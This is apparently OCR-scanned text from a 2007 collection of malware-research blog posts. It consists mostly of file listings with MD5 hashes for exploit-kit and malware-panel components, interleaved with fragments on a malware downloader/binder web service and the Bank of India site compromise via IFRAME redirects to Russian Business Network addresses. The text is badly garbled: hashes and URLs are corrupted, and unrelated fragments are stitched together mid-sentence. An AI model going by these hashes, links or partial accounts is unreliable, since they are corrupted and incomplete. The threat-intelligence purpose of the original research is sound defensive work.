68af1lc3f00b31ef072c99d95fa45 3ff6 

It. gif 
017aa4fbed00bfd848fb021462c296e2 
lu.gif 
230678f649c90589bf40024bd9ffa294 
lv.gif 
2eb690flaf034a71573641bfcfcf603e 
ly.gif 
72a42cca81f2e81dc65d9dd6f772cd56 
ma.gif 
ad81d516864533d1869ed296603f6e7e 
mc.gif 
3322300de4324fde3ee51d3d4431dc00 
md.gif 
7a363edf7896c044c1031a4c2f78110a 
mg.gif 
8adcOf5fe9c73b87cd50d4fb49485ccc 
mh.gif 
cdfdd26cff13006fd5a7f3bcf433cba0 
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mk.gif 
b8eaaa78b588dc5a78a213b665c3f41d 


ml.gif 
14bad568cfb82dde31f1d59eafe5f633 
mm.gif 
f0d6434e55addaclele0e9b43274c14a 
mn.gif 
df21fe047bf3840629594af786c510c5 
mo.gif 
04bb90bdf2614d372dec56449e912596 
mp.gif 
cac8345e9b3e072169bb833244ab68fd 
mq.gif 
aa80ab7a73d808d7b3570868cdc3d1fb 
mr.gif 
08c96ea87ff559d6dc6b4605fcbcfe40 
ms.gif 

d6a0a5e447 2ffd96e7d4c7c8d91led2b2 
mt. gif 
dc7a0aeb0f7280435a328cadce598b8f 
mu.gif 
9869ea31cbf8d3f2d1f42824122b61dd 
mv.gif 
9827918f9646eaa08854d45bef7ea093 
mw.gif 
12b2a62fae9c618544a56fef3d687306 
mx.gif 
7211e357363beb1da21ce32593b4f5a8 
my.gif 
51479ef74dfd0b2006983b6b9bff3d91 
mz. gif 
4b938aa9c776ea29cfOb51fb48f1767a 
na.gif 


a417cfe920429e7af07a98ea51laa22a5 
nc.gif 
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2135f0fb410b2f0767a7b534c753b848 


ne.gif 
489f6052b3d124a6607d4cb6a00022e1 
nf. gif 
9f851132acffal724a697ada9c539ff8 
ng.gif 
5ddf086d424340d2cd9al8e0f9c20ff9 
ni.gif 
bb8200af164d5a73758fa5822fbacel0 
nl.gif 
82994b14a5992b5a3539b9c0a789297Cc 
no.gif 
bbc9011e876a122ea89923e6b730ec50 
np. gif 
07dcfcc7ade4117c8f5d908101c22328 
nr.gif 
2a73be7cc4c7ae728e53748f07ce5b07 
nu. gif 
d7ad59b643ac9e8ecfe2193d37d08dc4 
nz.gif 
5809a037a53791f4632ed2756adf966c 
om.gif 
72045d2de14bc2f0b04b3cddb3c93892 
pa.gif 
192c84595d7ffb76229892030e08e37f 
pe.gif 
983af8b4835a96641f85449f2779a831 
pf. gif 
53c0188190e727bd3ea04778b4e83a9d 
pg. gif 
c0e201f4833b5bb6fe8ac014162ad8d9 
ph.gif 
0630367a44279677e4bff7f09dc820e8 
pk.gif 


fe878d940e0e3030c7258feca05b2ebf 
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pl.gif 
279fd88ddc4abbd4d808a087b653ea24 
pm.gif 
c74a19a09019278029760d4381e/7fa8a 
pn.gif 
997fbcf797457e2658d8f6df066cef78 
pr.gif 
a48b81labee4dfc5f36947006b603747a 
ps.gif 
bf9849158592502d0e12ce36401d1925 
pt.gif 
b68938af019e2c74377327abbe3d4b5e 
pw.gif 
a19c54b3a802fa6ba217099df5c4659b 
py. gif 
bef5b19a0555c6b85fa8f46055e019c7 
qa.gif 
8de77aa8a0a825346fac6d29837c2449 
ro.gif 
8569e94e81a39bbb43ed8445d1a92dd5 
ru.gif 
addac471b8ddc26a9f1f2fa235330d80 
rw.gif 
26c4bdfd43b5d836acd1dfdeaffa4cf4 
sa.gif 
94c55d70da8c458459597aa1d9b60112 
sb.gif 
76cf18354aa71695e488923f516fc23c 
sc.gif 
65c089b927687a801afd75528f1lb6def 
scotland. gif 
ffd4426704720dc580138a55a86e5d9c 
sd.gif 
983179ead3080585811d73e729e678al 
se.gif 
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cf357235e945172661d7ee5fde26f909 


sg.gif 
2a46e9e31359baaeb4e6ab4b0b950961 
sh.gif 
041dff1f55c07bcda4f53a75be64af18 
si.gif 
b796cc14ec4516ae9098e57a7c391dab 
sk.gif 
ffac49f21971212d048422d36a555d50 
SI.gif 
dfea6e55c87213abcca8e95ecca/00dd 
sm.gif 
59f434ebf3668c85d1fbbffa751fff6e 
sn.gif 
379caf2d23ed870f9e0239ba93ee7551 
so. gif 
e1d51439b1153ae38776553a7bcfl0d0 
sr.gif 
4e5415a5e3fbf7496007249478c12276 
st.gif 
6596dc6cdeed9b4979fbb5c7609e66f5 
sv.gif 
€3479c1d5ac76b8b7dcfb709cfd0083e 
sy.gif 
d86f69a9267f00e11030246c36109bc5 
sz.gif 
5d7b57a0a5883abcc3fe28c1d4b2dfld 
tc. gif 
0e5370c94999fb37c1a730337f431f50 
td.gif 
2782b3d0blab6eaa48d091fc938b97cb6 
tf.gif 
9elaf29a601960b84f90fb2efacb9bd2 
tg.gif 


ece0a5d9d0ffa8662f66a37c667e9538 
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th.gif 
a4be77cc567463a6ab33df47a6471f90 
Thumbs.db 
c38b33f4ce4b895bd044500a5ea1f516 
tj.gif 
9b1b0ecd454b7ccad12431a2a0281914 
tk. gif 
c895d3c66ec3cf659b59d854cele0e9a 
tl.gif 
9e79c92f60fb33cbb83addf04c64c789 
tm.gif 
8453e36426a3acba26bac199c92fb095 
tn.gif 
30245ac4122c61accb380e162691f431 
to.gif 
ecacff3913a318a8556ed4dd7a6582a7 
tr.gif 
3c7e51066bea641449722616fdce2d21 
tt.gif 
5715707d79f5a81c9686c593f65f2e80 
tv. gif 
4a0b50aa81de8101f281la3d6dfbc4aal 
tw.gif 
c6da9ab7f3bfe2fd202e993b99aa9158 
tz.gif 
6af3860230e7cc1b12049731a95f4e4d 
ua.gif 
acc1cf561309691198e59e23c9840d13 
ug.gif 
e29af593a8eachb68e81755c78a7dbf19 
um.gif 
8346f478516f733a68c500410fd57159 
us. gif 
4a0cdce756ed771a5d9a16114179d5e7 
uy. gif 
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74786429627d504ad3d36b0c4a40a638 
uz.gif 
2eefb9f89353a9554188dc522d07c68b 
va.gif 
6f64ebd984e71e113042dfb5b5dfbd73 
vc.gif 
cf4329d0flda7924b3eecla0f725ce45 
ve.gif 
e067f0c4fbaa5ed99477581e86630faa 
vg.gif 
8510bbd7fc9843b558424ac411992732 
vi.gif 
6ab52e66bdf59c0826bb205307eec76a 
vn.gif 
66364a250886c943e1f40fb0762c0a63 
vu.gif 
269340d3432e0bf04aa2d20b1916d723 
wales.gif 

7402 7bf2c92ffb8d744e09a72467bf36 
wf.gif 
321ff7ca69712a9af5405291f972dd0a 
ws.gif 
32ac83d94d72fc5abb59dc917a07fc72 
ye.gif 
743f4826f90f1ccdf9400d100da04ae7 
yt. gif 
b8c20446453d8057fcc73db427ab9f9d 
za.gif 
c8d80912d6a8a8fc94cb856871a864cb 
zm.gif 
88d75c077c65a544c5676bc35eb3f6F4 
zw. gif 
fd5cc25e0cea7e07b0be89c5452c546c 
sort tables.js 
ed6525437174280ea6bb8e9cd4113c56 
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In the first example we have a malware downloader as a web service with various diversified 
variables such as custom port and IP to obtain the payload from, as well as the ability to modify 
the extraction and execution of it. Combined with the option to choose a packer, and whether 
or not to melt the downloader after it delivers the payload, as well as with the opportunity to 
choose from a set of predefined icons or select a custom one, turn this malware web service 
an interesting one to monitor. 


A sample of the first service : 

Result: 5/32 (15.63 %) 

BitDefender 2007.08.31 Generic.Malware.Fdld!.D8E4DF1F 

eSafe 2007.08.29 suspicious Trojan/Worm 

NOD32v2 2007.08.30 probably unknown NewHeur PE virus 

Sophos 2007.08.30 Mal/Heuri-D 

Webwasher-Gateway 2007.08.30 Trojan.Downloader.Win32.ModifiedUPX.gen (suspicious) 
File size: 11776 bytes 

MD5: e9df373f1561bed2a2899707869a7a44 

SHA1: 295c6702cb19f6b20720057d61d940921602a0cd 


In the second example, we have a malware binder as a web service with pretty much identical 
features with the 


file to jain ? path to install ? execution ? open with ? 
yes | 


custom icon ? 
upx compression stub (9) ? yes | 
meltstub ? yes 


first example. If traders of malware services such as the above mentioned crypting, packing 
and ensuring a lower detection rate, start embracing Web 2.0 in the process of efficiently con- 
struction malware, or providing their customers with a DIY experience by constantly ensuring 
their " web dashboard" is up to date with new services and features - it can get very ugly. So, 
let’s hope it’s just [6]a fad. 


1. ftp: //adanchev, blogspot. coa/2007/05/yet~another-nalware-cryptor~in-wild heal 
2. tap: //Adenchev, blogspot con/2007/07 /aore-nalvare-cryptere-for~sale.btal 

3, heep: / /ddanchev. blogspot .com/2007/0 /aulti-Leature-nalvare-crypter. nea 

4, http://ddancher. blogspot .con/2001/06/diy-nalvare-droppers-in-vild. heal 

5. heap: //danchev.blogspot.con/2007/05/malvare-loader~for~sale. tal 

6. heap: //en.wikipedia. org/iki/Fad 


«htaccess 
d522e5fa9f320e8608f2d4dcd45ad219 
core _config.php 
d6272f9bf8c04b97a3a577917f95cd8F 
core _functions.php 
ae08555fa4d377356f52d8edaf48db40 
core geoipdb.php 
895b7e5b604c9ea5af0044e16851cel19 
core _googlepr.php 
14d383efeb7a6eb74e739d98f80eab6cb 
core obfuscator.php 
742e0f91315045f2fc53bb4fcef2deac 
«htaccess 
d522e5fa9f320e8608f2d4dcd45ad219 
admins.php 
banned.php 
banneddown.php 
browsers.php 
exploits.php 
ignore.php 
langs.php 
mystat done.php 
referers.php 
systems.php 
«htaccess 
d522e5fa9f320e8608f2d4dcd45ad219 
browsers _old 
9f0f0359e2ddb134f6956af5e0628c6c 
systems _old 
eddcal158e795a8afebe3177e7199b1e8 
«htaccess 
837c9ffb7faf837ec57cb2c7e6d43c0f 
add _ignore.tpl 
361a727cc4a43adc42dea9b958bf98Ffc 
ban.tpl 
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76ac9ff593e95f3fdcf6b38b8d85ce9b 
body.tp! 76ac9ff593e95f3fdcf6b38b8d85ce9b 
browsers.tpl 
4196ad0a18f6ab93239b1fd869920afc 
check.tpl 
O08beca2da5b4a0bb3d8ac053410ae231 
clear.tpl 
74e77cala3d992dc11b0ff8b7319ef50 
configure.tpl 
ade6db8d674df913a5ac4a0720e9e8bc 
exploits.tpl 
6f53b7639bc59c7a27fc5b8a38f7d621 
exploit body.tpl 
76ac9ff593e95f3fdcf6b38b8d85ce9b 
geterror.tpl 
623b11547c8f492f226b235643c6b268 
header.tpl 
bf523dde3a527c1d7007302b803a2d5a 
header _table.tpl 
954c5d5deabf4a761la6cfaad66d6e7b3 
header _title.tpl 
b9eb1f12777fc465bb758d2b434f5a6c 
iframes.tpl 
el6aaldb8fel5aaee09c3d44badf2t77 
iframez.tpl 
0f79953d11a9353f09d5bf975d723f0d 
ignore.tpl 
b0b2eb931f1319846d56be91bea9bd3d 
languages.tpl 
886943648cd9cbeb0f57bc6f6c79495f 
languages listing.tpl 
6e379ff19bcldc4e83fdca2cac414c95 
login.tpl 
2160d523fe97ff5da964cae7458f2cfo 
navigate.tpl 
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elfe9c8c5ec4f49e916f0c1lcbc7c9dal 
referers.tpl 
bd1fbd98cb4448179478cb57202bf543 
referers _listing.tpl 
2fa44891db7eaef670db810155el1ca9 
statisctic.tpl 
47c6ca0c45285d616cd945de6870a8d1 
systems.tpl 
5ff3608516fd33628d4b15184484d1d2 
upload.tpl 
a917d4b48e8c452852bb010030a52615 
admin.php 
b878053fle0ff1983e91b114d04dc969 


exec.php d8decfcc9959a5edb7f65d222b728cal 


index.php 
cecfd88a9eeal1b9298b301a4e96cb122 
install.php 
cdb9daaf0ea3e21b772d0a7513e6a72a 
Idr.php 
e0e0b53e7dd86745c24be00c97582346 
login.php 
4396c8c4004058187359dal10e1308fb8 
read-me.txt 
d643be526dd7ae2bded31785dcbb3184 
Readme.txt 
faf893e2c8863db5bc5e34f4b84af8t7 
setting.php 
8d5515c3dd2e384d7051lae46ce5c6fce 
!www.cyberataque.us.nfo 
054d463882135765aeebe5101556941a 
background.gif 
9a130396c8fcce91e570fbeb6abc417d6 
bg.bmp 
34783e627f91b83ebddf13f2f49b3c22 


close.bmp 
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86ab02453c8d16ec7941904bab4face5 
favicon.ico 

7744dd84fba7 79db94a09425dbec4331 
HACKING APPLICATION. html.url 
068a74fd6586c6b5bbf460e8c31cfaa4 
icon.omp dic701dce9326c7d6df4a5ea52cd6074 
logo.png 2e082d2196c48cc079b3037ce4132e5d 
Thumbs.db 
d814bce4836423c35df15ce364d3db3f 
Spider Pack.zip 
6c9aa5e7050elb2c8ebefa6830f3cbb7 
untitled folder.zip 
46074a7d479b0a53e53e6c1a9a25c773 
codes.php 
1b6a8b96c52e5d3847c4dfbc79188ebf 
index.php 
15de933d18d831ffffd13352483d2945 
index _winopen.php 
d572b25ebfa3db3b1bb974e3be0a5aab 
ip-to-country.csv.txt 
82a6cfacd4699f088ab5128ea88ff262 
_country _install.php 
3bbf3c830b55aadebbdef3795408f925 
admin.php 
de9995478cb0abc079dafe24a6b5bd70 
chm.chm 
daeaccfd929a1d9a5f424ed080e73fc0 
hta.hta 
c6700ed5bc72f4d579ded4a3aeeb8013 
jarjar 
40b05dc3ff641464e669da9008144a6f 
ReadMe.txt 
445aca6e5f4d51db96eb84456008324b 
ReadMeENG.txt 
8893842639a272166986cf63ba2042ac 
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_dat _install.php 

bf4167e670c42f840162077e9f3ec76b 

chm.chm 

daeaccfd929a1d9a5f424ed080e73fc0 

logo.php 60129d7765ffdc899aclad9ab5c8dd0e 

hta.hta 

c6700ed5bc72f4d579ded4a3aeeb8013 

htm2chm.exe 

8e30ffbd9ablebb6220c160023338643 

htmlcompact.exe 

b4801cc863c8f26a168e63b2085fae2t 

htmlcompact _serial.txt 

€62795c8b4bc9450e838eb71db4d7a5e 

context.php 

9a0364b9e99bb480dd25e1f0284c8555 

counter.dat 

b64d80c3cf4388d3fce68a7a4faal 9df 

log.dat 

5814440e9a7640b2a0f3182c16b22691 

AC _RunActiveContent.js 

9b2224a10312f4ef94fca5bcefee5bdb 

commonzj.js 

1f7683e66ca57986099f140fde63f4f5 

d.swf 

37330ba6a5d326d46333a8d51d9be907 

engine.js 

bf621d112060d0fcffe9fdc76422f7a7 

play.swf 777970f78a57aeb5d518bf4449e4b7b6 

tongji.js 

4ba24bb72fc15f7 6f36f0d70a809ec75 

util.js 

4e6d675c0581cabfc8b3d67f8635cc02 

zDialog.js 

bb22d73b3795290b7fab0530187b65f6 

zDrag.js cfbb658a6e4742200df56ed755f292da 
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«htaccess 
7977f3cff06450391f72700c77dbdecl 
count.php 
e161e0393783f211a3a81d31a00a8eab 
dump.sq!l 12e9a6b5d0203c4b150b1350a59c5dcO 
getexe.exe 
9cd2c4c2c348aa019a041d86d282c2e0 
«htaccess 
d522e5fa9f320e8608f2d4dcd45ad219 
history.dat 
0aal7ec194f286cddf864a9a5dbe5948 
history.dat 
40cd750bba9870f18aada2478b24840a 
opt.dat 
f2ecda26d35c7999114fc323eefd8778 
prcyhg.dat 

bad.dat 
a69e4700c7a8655f135bb8eca42bd7da 
good.dat 

iframed.dat 
e€812d0855b6423679d7759bb77d4140a 
iframes.dat 
36ddfb830calle20b64ad1b6650aca33 
jobcron.dat 
92426dd4a47a0cdc43528d41dc763be5 
jobdef.dat 
998b864500d3414e7a9021e88b57c386 
jobnow.dat 
6c94c2bcd6d6eb991e0e869ce38aa52a 
lastlog.dat 
fa130a4903917b3e678cc8e469b969a8 
notifr.dat 
717cffb49e8686dfalc4f19bceb88b28 
reserv.dat 


status.dat 
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c95ee9ed5c7fab78f2be9ffa31fcOf5e 
temp.dat 

timeout.dat 
402a3c33df3afe33b20101bc525773f0 
trash.dat 

uncheck.dat 

404.dat 
€937ab7561f20d8baf5e846c849ee6dc 
suspend.dat 
bfeb8e6b1717db53d8a35a6cf78f1d18 
x1.php 
d2c9d7260bdc6094b88265a6b8ed3e74 
x10.php 
5692af4ca227b6673298e90d4c9bfc6be 
x11.php 
4e45187bf18490bccc42d176c0998c21 
x12.php 
a383185d00e085e7f24f9e9c567bb4ff 
x15.php 
49c9ce55b9f5331045104d44daab6256 


x15b.php ceca2026fb3f9496a626f45ff23b8e67 


x16.php 
7f5d360b45d40511fab3c6falec0027a 


x16b.php b989d8a228054378f95d291b5bdfc781 


x2.php 

19974fecf68485 7a37529e035b758887 
x3.php 
631leac40acde9e79dcaa5ce00df0c89a 
x4.php 
da7a2b607b26e1b5c99af0fb07fc8b2e 
x5.php 
9e486a60d671lefd7733aede4c09b78f5 
x6.php 
fabfflae5421e75f2656a4f50445673c 
x7.php 
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b3ac92d86bbc0699c9a7aa97d9668bcb 
x7b.php 
af7cda89e3calfed306f4bd06262e0ca 
x8.php 
338089761d48a58945b696e96a6ae55f 
x9.php 
97b028a7a52e84b5abc5b2aa8c91e472 
«htaccess 
d522e5fa9f320e8608f2d4dcd45ad219 
crypt.php 
82050953577b7a412d0e3c5f2f53805e 
GeolP.dat 
fa685d37c5702689745d44f6bc89bd07 
geoip.php 
79ef9767b4da66fc77ab67dfeaaf78b6 
mysqlcfg.php 
646b84f7ee3473d95535e4ff7b4045ad 
prcy.php 85a12cec68b241f36874a66b3375114c 
prcy _alter.php 
b7fa4f8e530981418e8eebf1696e6a0f 
titles.php 
b07085df5668a3b100c5ff519959ae82 
actions.php 
58b3b0fef8b72ca592f4d978de060243 
cleaning.php 
2cdd959f026881¢c5c3713819f17324d7 
countrs.php 
894c155ea0864a0d5b284030fea332b6 
details.php 
5878157d7e18dafd999e35751a85c19F 
exploits.php 
3f5aefa4c94d5f2eb2b31eecd8c46912 
general.php 
9d2ca6ceccO0bbc2c7986175e9dd0ef7 
history. php 
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a4cf94ed4ac99f5182a9dad8cbe21f83 
index.php 
bd7283318f51e004196c934a7eed1bb4 
mainten.php 
3c2c6072ea71054ff4135e5492eb19db 
referers.php 
600c7b3b74671d113240778237d59ffa 
summary.php 
f856abaee5606301bd8f60ab251748ea 
traffic.php 
b8f72c1738947c257fd0ae8a9eb5857b 
useropt.php 
74d4046f5b8b7879fa284e481f37b634 
users.php 
f04df89f4d96711ca8f987c76e6bcbec 
tornado.gif 
7b46b54fe91ce828270680272a04ac87 
0.png 
7174b474d5c1b02516e0746600d0c546 
l.png 
637d93b8eeea8baace2fccec85211953 
10.png 
fa89fcebb5364490b01a82d307a2dbff 
1ll.png 
cac46eee4aa893b80bd9a8baele50423 
12.png 
c58f2119163a48614ad88fd84b09546f 
2.png 
bd6e668el1fb1b42650ab4fa5f3e78601 
3.png 
3cccd5cb37aee00ab99022197a65e6d1 
4.png 
b903f98e797437aal8fbe37b2a069e22 
5.png 
df08a3353c7f7417b68c4aa466804aea 


10241 


6.png 
4e4068cf84fca3e714183f0f8cb4daf3 
7.png 
05e06928335fb3dfbac897fb68a666d4 
8.png 
7092806d2f12ae7a0fad364d5352f8b8 
9.png 
13483bb587b8876984979467ebd2b8ae 
-.gif 
d12bacb6e3a0bfalb51fc279dbea515c 
al.gif 
38dbd288620c801ea083139b4eflcfc2 
a2.gif 
38dbd288620c801ea083139b4eflcfc2 
ad.gif 
b6b1e9619ed7289fba573e8d889d3819 
ae. gif 
b42e6f37ba2e059876e9cad6c8afbd98 
af. gif 
ccaf2f8cd19e558d2cb925e37b120f20 
ag. gif 
f60877160a45fe086b5943d487144b23 
ai.gif 
e9f155a292785d401d472c25a2735f39 
al.gif 
2379c017b4858d90f900b3564a88b72e 
am.gif 
6a2e3d4ac7139f1665ec85daf905c4fb 
an.gif 
3felba098d2bd5f85c996ea0a5d7dd5a 
ao.gif 
3a30af9a98cf20e6619eeE234e8c7f929 
ap. gif 
38dbd288620c801ea083139b4eflcfc2 
aq. gif 
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3.8.25 Bank of India Serving Malware (2007-08-31 12:03) 
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Ryan at [1]ZDNet’s Security blog is reporting on the [2]breached site of [3]Bank of India, 
which in the time of blogging is still [4]serving malware to its current and potential customers 
through the infamous Russian Business Network - 81.95.144.0 / 81.95.147.255. 


At the bank’s URL there’s a link pointing out to goodtraff.biz (58.65.239.66) where an 
IFRAME loads to 81.95.144.148/in.cgi?10 whereas while accessing it we get response 
from 81.95.144.146, where we get the usual javascript obfuscation leading us to 
81.95.144.146/at/index.php and 81.95.144.146/rut/index.php. Furthermore, the second 
IFRAME leads us to x-traffic.biz/ts/in.cgi?user0224 (which is a Russian Adult Traffic network) 
redirecting us to mymoonsite.net/check/version.php?t=167 (81.95.148.13) and a third one 
loading goodtraff.biz/tds/index.php (empty). What does it mean? It means the Russian 
Business Network has not just managed to inject its presence on Bank of India’s site, but is 
also using multiple-iframing as an attack vector, thus creating a fast-flux network with multiple 
campaigns within I'll assess in this post. 


Apparently, [5]Trend Micro’s been busy uncovering the [6]n404 exploit kit, which is also used 
in this campaign aimed 
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23507525ab4e7d1023a3a6940790d9c6 
ar.gif 
2940a84a15b26e5ee37fa29a89947228 
as.gif 
e56e28dec792c71b32cb7299ebd83751 
at.gif 
cadc74036384cda59ee91d99bdcfdd69 
au.gif 
b91b6739c8107e29680568ef8ff952f9 
aw. gif 
8e91812abcd372b3a32e7c16c15dd8ed 
ax.gif 
38dbd288620c801ea083139b4eficfc2 
az.gif 
64c82a7cafccd37a526f7745b915b8aa 
ba.gif 
1c8a23d4d9ed0f8decf5eea261e631b5 
bb.gif 
ae7aadd035a40e5026a777e2ecdbd5f5 
bd.gif 
5349673c83420f65faac21f9ee14a7d2 
be.gif 
e2697c0d2f33f4c8ca85dac762734cfc 
bf.gif 
d10e907a9fb8487940f6c5d350dde6ae 
bg.gif 
f6e51fba28e2744b678ffd752d75f945 
bh.gif 
b8aeb3f5a24a277ea6c826cd4113e2ee 
bi.gif 
fe5f4500cf4baefld65a424e8d5689bc 
bj.gif 
97af4afce5fd166559201493f6848c47 
bm.gif 
06045f155dd3b1d22cd28b86e57de479 
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bn.gif 
43948655b170b8e063f023620d97c76b 


bo.gif 
9c4ef78c1b8051c0038227e04705c871 
br.gif 
667c1c786e5365ealff2c5lbaed8e6a7 
bs. gif 
1bc0alb6cf00a50bb9bf3588d84b321¢c 
bt.gif 

995226c86da889b7 7ee9fa9c60bee399 
bv. gif 
e023614ca4df2ed1be0dacf9f736826a 
bw. gif 
d4232256a8374cff569021c5351301be 
by.gif 
23f79b7553f5cdcc90f3bcelf7feld0c 
bz. gif 
2ab46e28a4d3084d7620e0aaecf4c235 
ca.gif 
c1c24f48ac653bf3f07423fd12ecd11f 
cc.gif 
38dbd288620c801ea083139b4eflcfc2 
cd.gif 
b74241ecd992051a41c456f3e6ec2ad3 
cf.gif 
fdd15d7a37c8e885b731d6f7c8c67dc6 
cg.gif 
62a3129d39d66d648580fbeeflfce60f 
ch.gif 
a9aa4db50f1d232d494610110455e98d 
ci.gif 
0f8d3618f8a62d914f0f792a83c2c687 
ck.gif 
edafceaaf10f5f387523fd27915628e7 
cl.gif 
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65341 ffddf87323b55fdff8bb115bc75 
cm.gif 
1bb0670559a2676fd42dfdef3a7b1b/7f 
cn.gif 
12a79273092a0a93adbfe9b685634e5f 
co.gif 
966dc7ed9306794734a2e61438f89744 
cr.gif 
c5fa3319590501d12afd4e16b4ed81b0 
cs.gif 
952b2c82b24265f4100538989299dc1c 
cu.gif 
a40b55eeca54fe5605f06d194b179d3a 
cv.gif 
d26c9fc27103d723586ba616057460dd 
cx.gif 
38dbd288620c801ea083139b4eficfc2 
cy.gif 
d8dd4cfcd2570984219c9826d417ee9a 
cz.gif 
3c706c7f9d3bb30ae2df290c8a9be3e7 
de.gif 
1f31389417402bf187e3276579adcfcl 
dj.gif 
c7bf7379f87e9aac8c045ed3bf58da23 
dk. gif 
8337faebf55a6e5b297aff95517147a9 
dm.gif 
6f33e31ac969168d9431cc865001la21la 
do.gif 
d50d679037a133f49533abd436aac790 
dz.gif 
fd8b3e3a882012c111c387b4a24c201b 
ec.gif 
6d213134a8af6250fe5b269d16b52967 
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ee. gif 
3e3f7d30e9e58b2c98f6f5d7f7bel64c 
eg. gif 
9600de10fc4779b7873d463e4a5188e9 
eh.gif 
38dbd288620c801ea083139b4eflcfc2 
er.gif 
238dde43e7077fade86597999e6046c2 
es. gif 
4fc4c91dbb8012db776af9b476c4elcd 
et. gif 
737dc12da78a0b27b999544a41b8c954 
eu. gif 
6a257a89ee638d66865664ee968ff7 2c 
fi.gif 
Oaae04dbd30720f6bd155ce7840910e3 
fj.gif 
a825cdf6cdc75877a2748201e0d14874 
fk.gif 
a2d83821d143ce2c35e48c9e9ef021e4 
fm.gif 
5cbe429c604ede636f93f9e3e65d2d3e 
fo. gif 
adc678b55e16ee1c8e4363e1fd764086 
fr.gif 
7f66797472eb9360e0bd22bfcfb9delf 
fx. gif 
38dbd288620c801ea083139b4eflcfc2 
ga.gif 
96de40e3362ec03980171a6b347755e4 
gb. gif 
93cb87bcf85c3b2756f6b296494cbc37 
gd.gif 
83810a8a9a36dfla42a7e2df644b07e2 
ge. gif 
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ac87f86413d9e214be3de0d3820cfla7 
of.gif 
38dbd288620c801ea083139b4eficfc2 
gg.gif 
38dbd288620c801ea083139b4eficfc2 
gh.gif 
6e506c781480alef5eb80a5f415c300a 
gi.gif 
26f676e5676155claal278e3c0e2ede6 
gl.gif 
220ba9d5444b958512cf8c14e6f3664d 
gm.gif 
6b71edef56d177266bd076cda58def7e 
gn.gif 
c07acd5a538c11ec4933de155b5341a2 
gp.gif 
d12f295c5396a57c3ca27de5e46b1f94 
gq.gif 
303063fca23a70f425dc923ce3f34b30 
gr.gif 
cee23846c8603623882ed5134406806c 
gs.gif 
38dbd288620c801ea083139b4eficfc2 
gt.gif 
9b5e92154496a88f1cal0648454977af 
gu.gif 
d8ee6ee605a30ddadafb179000fle62b 
gw.gif 
7008cdb584b4983fbf7458de392f3b82 
gy. gif 
e0745abf42d852da0588adeab822c002 
hk.gif 
83301f5dfebf29cd5aca49a6272240c8 
hm.gif 
3a24264185daf6e8c307d523a544e5ac 
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hn.gif 
99b20f53c38c2f36de5677946e7cb042 


hr.gif 
39cac2f2e2e6a9f41f89026442287682 
ht. gif 
99b88b35b9310162500f187da64b579e 
hu. gif 
3212a65eba5018fdee554234c45fb5ff 
id.gif 
a3fe271b1dec3d96fd3cebce6591c840 
ie.gif 
d0101b97df3644ac8ef40780ca5cdf8b 
il.gif 
ce092caal539ae185ae407fbc543cd5c 
im.gif 
31a602ae1723a9e5bfffc3304c15287e 
in.gif 
3f042¢528c4bf957777be35f6b18c691 
io.gif 
35b9c8f05cObce96ae295cd97997bb43 
iq.gif 
43a114c7298e15308378fe959f94f3ed 
ir.gif 
2a8da57126b658e256ce5b93c6949b83 
is.gif 
142622e0042666bac6eebeaf8c8e53ec 
it.gif 
72b0c360b078e4b7d58840c12ec89525 
je.gif 
64dcc7081f35b7c08f4eacf253ebe3e0 
jm.gif 
b71f782c24a3caf90d61119fc2a03ade 
jo.gif 
9ee5f4d1e42146b658b84b3ddd99119c 
jp.gif 
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531e4982260e50c173872d32553b9d91 


ke.gif 
27481845c6081487f2b67fc7754f8944 
kg.gif 
202b1977ecf77a413b7565ada8el26fa 
kh.gif 
10324ab7e6a04171269da2092333d4e6 
ki.gif 
3367e0e37cf04ef726ed4f31cbb255b1 
km.gif 
17361663c32c0a3571775c60f54b5861 
kn.gif 
c5a0cc06a7a96c002b2aa69C85b128a0 
kp.gif 
83172c1241cad924321c27151533316d 
kr.gif 
27b12726647e7e783763ad85fbf407c5 
kw. gif 
f58f3613420bee6129e2967e18989839 
ky. gif 
cc6c838c50ec7d1lec09f4c59537f2c05 
kz.gif 
c9a29f216dc2aeb3f73f7b50b77a4b4f 
la.gif 
66ac74583c1859ea55fe34a81c73c304 
lb.gif 
6b7a372934ffc86493ae4daadaa67501 
Ic.gif 
4ff65704775e685024c149a9b86787e0 
li. gif 
7cffdd4b033b2e5534789c0471a291lee 
Ik.gif 
d9eee6b3fcc3d011b684d422ccfd6e38 
Ir.gif 


€2623c89857fd31be09af4t4f713b73c 
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Is.gif 
bcbbO85a5dff8f8e84cb04a140281745 


It. gif 
d4487bf9895cfbal4176c57f966050a3 
lu.gif 
c333c2b38ad7dbec56be0ea95460al2c 
lv.gif 
514de74dc630c59838c4406dbc6f3815 
ly.gif 
ad9d25d33cfa64c074d4afce1944a7a3 
ma.gif 
a64b6726eecb6c97cdc7d9e99F97F58b 
mc.gif 
b078930a4bc2282c3669e0af905513dd 
md.gif 
d10c62b50e2d991f4229d01613bf64ba 
me.gif 
38dbd288620c801ea083139b4ef1cfc2 
mg.gif 
1fd3270525bef3c2209e0a3bcfcef238 
mh.gif 
65cb04da9b025288c09d06208b748581 
mk.gif 

8046e9ba93 70efa3c5f7312000d0a608 
ml.gif 
82a7c7d6956cfaa9ec2f2b0b679d15al 
mm.gif 
25009266f5706ef498422ad4b41b5cla 
mn.gif 
75afb51335f3a965ff7f1b4435c6828c 
mo.gif 
8b4d9ee4b065403e3efa837ab3fc3d79 
mp.gif 
£7536c02354a2aa29ad117a0e317046b 
mq.gif 
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31a6497822781lafecafcO8efdb911459 


mr.gif 
09c5b268ee3421d9a36330ecal8f27ed 
ms.gif 
639022bebfa4985f543eb4c7c55cb4c9 
mt. gif 
b630e0faea7c9db87aeef9cae912d573 
mu.gif 
938ac0665ff92512fd5clle4b99eaabd 
mv.gif 
45aaaab68ef5628a951laaf7a8465c78e 
mw. gif 
2da84fc76988ed6d3d09d46d6d71d6dd 
mx.gif 
d3d43f8b958739b00582aa117b7b0d5f 
my.gif 
809e20fabeadfa4f6dfaf629bfe32786 
mz.gif 
169b88a2d2e2b61074725cafcdb02137 
na.gif 
7879034a66005c6362f2dd6e76006903 
nc.gif 
1891dd4e9799a25058fe59c2ae6bcab6c 
ne.gif 
9f8f0b3e38b4b388cd1a876991632f25 
nf.gif 
76521b2845914c88e6ae0d70623d1fdd 
ng.gif 
d97fe7f8986ada525dc000848a63f904 
ni.gif 
97196c326f4192d80fb0370c2eb14bd3 
nl.gif 
96199acdb50773fe45dfdbc31078ea4c 
no.gif 


d98132d9186daf717fea60b515391dbb 
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np.gif 
563b2a18cc772e8152588f1593e62296 
nr.gif 
43990e2c126fd5fa663ebff4aeb7abe9 
nu. gif 
